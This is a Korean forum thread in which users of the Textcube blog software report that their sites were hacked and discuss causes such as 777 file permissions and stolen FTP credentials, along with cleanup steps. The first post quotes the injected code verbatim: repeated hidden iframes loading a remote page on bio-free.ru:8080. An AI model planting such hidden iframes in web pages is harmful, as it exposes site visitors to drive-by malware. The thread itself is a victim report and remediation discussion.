1 성현이 작성한 주제

  • 성현
  • 방문자

주제: 지금 버전 텍스트큐브 해킹당함

<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div>
<div style="display:none"></div>
<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div>
<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div>
<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div><div style="display:none"></div>
<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div>
<div style="display:none"></div>
<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div>
<div style="display:none"></div>
<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=257 height=821 ></iframe></div>

해킹당하면 본문에 이런게 소스가 있고 하얗게 보입니다/

index.php 에 아이프레미으로 위 소스가 하나 삽입됩니다.

http://domain.com
http://domain.com/blog
첫 번째 루트에 설치하면서 퍼미션을 777, 707 로 주면 100%로 해킹 당합니다.
초기 설치시 777로 변경하라고 하기에..
장기적으로 777로 변경하고 다시 변경 안한 곳은 100%로 해킹 당합니다.

2곳에 호스팅 서비스를 받는데/  6시간 안에 같은 방식으로 해킹 당했습니다.

따오기 글 1

2 LonnieNa이 작성한 답글

  • 지역 대한민국 > 대전 > 서구
  • 가입일자 2006-04-04
  • 글: 3,686

답글: 지금 버전 텍스트큐브 해킹당함

사실상 권한문제로 해킹의 노출이 되는건 사실이지만,
그렇게 쉽게 된다는건 호스팅 업체의 보안 문제가 더 크다고 봅니다.
그렇다면, 텍스트큐브뿐만이 아닌 흔한 xe나 z보드 등의 777의 여견을 쓰는 여타의 웹프로그램 모두 다 그렇겠죠.

텍스트큐브를 이용하시다 불편하신 점 있으시면 아래로 연락주세요.
Needlworks/TNF - LonnieNa
nateon : y12x2 (a.t) nate.com / mail : lonniena (a.t) needlworks.org
http://twitter.com/@textcube

LonnieNa의 웹사이트

따오기 글 2

3 cocobat이 작성한 답글

  • cocobat
  • 방문자

답글: 지금 버전 텍스트큐브 해킹당함

저도 오늘 당했습니다
index파일마다 iframe가 들어가면서 파일 내용도 일부 지워졌네요
전 t-age.ru:8080 이런 링크가 들어갔습니다

가비아에 연락해보니 누군가 ftp로 접속했다는데 전부 아이피가 다르다네요
아무래도 해킹툴로 접속되었나봅니다

따오기 글 3

4 hoyajigi이 작성한 답글

  • 지역 서울
  • 가입일자 2009-01-23
  • 글: 95

답글: 지금 버전 텍스트큐브 해킹당함

역시 서버를 하나 받는게 속편한듯....

따오기 글 4

5 성현이 작성한 답글

  • 성현
  • 방문자

답글: 지금 버전 텍스트큐브 해킹당함

텍스트큐브에서 블로그 소스 받아서 간편하게 복원하고

FTP 비번 어렵게(특수문자포함) 변경하면됩니다

루트의 index.php 와 플러그인 폴더 덮어쓰기하고

index.gif.php
파일 찾아서....이건 어딨는지 찾느거 귀찮아서 저는 어땟치 폴더 빼고 그냥 덮어쓰기했습니다

아니면

기존의 소스 하드로 복사해서
탐색기에서 index.* 로 검색후 일일이 수정하면되는데
어떤 분은 소스가 변경되었다하니 그냥 덮어쓰기하는게 편할 것 같습니다

실질적으로 FTP 계정으로 들어와서 해킹하는거니

비밀번호 변경하세요  어렵게...........

따오기 글 5

6 inureyes이 작성한 답글

  • 지역 대한민국 > 포항
  • 가입일자 2006-04-03
  • 글: 4,471

답글: 지금 버전 텍스트큐브 해킹당함

흐음 보안 안내를 통해 777 퍼미션을 변경하도록 하는 부분을 안내해야겠네요.^^

그런데 파일은 쓰기 권한이 없을텐데 어떤 방법을 썼을까요? 흠... 역으로 한 번 생각을 해 봐야겠네요;

혹시 서버에 indexes 옵션이 켜져 있으면 리스트를 바로 볼 수 있을 것 같기도 하고...

"Everything looks different on the other side."

-Ian Malcomm, from Michael Crichton's 'The Jurassic Park'

inureyes의 웹사이트

따오기 글 6